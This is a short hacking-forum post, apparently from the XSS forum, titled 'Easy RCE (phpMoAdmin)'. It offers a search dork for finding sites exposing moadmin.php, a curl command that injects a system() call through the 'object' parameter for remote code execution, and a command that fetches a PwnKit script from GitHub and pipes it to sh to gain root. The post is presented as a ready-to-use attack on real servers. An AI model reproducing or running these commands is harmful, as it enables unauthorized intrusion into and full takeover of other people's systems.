• XSS.stack #1 – первый литературный журнал от юзеров форума

Easy RCE (phpMoAdmin)

Stirlitz

CD-диск
Пользователь
Регистрация
08.10.2024
Сообщения
11
Реакции
6
The title isn't a misspell, it's for http://www.phpmoadmin.com .

Find a site that uses it: inurl:modadmin.php

Bash:
curl -k "https://site/moadmin.php" -d "object=1;system('id');"
And it's done :)

Most of these servers run outdated linux, so
Bash:
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
is enough to become UID 0.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх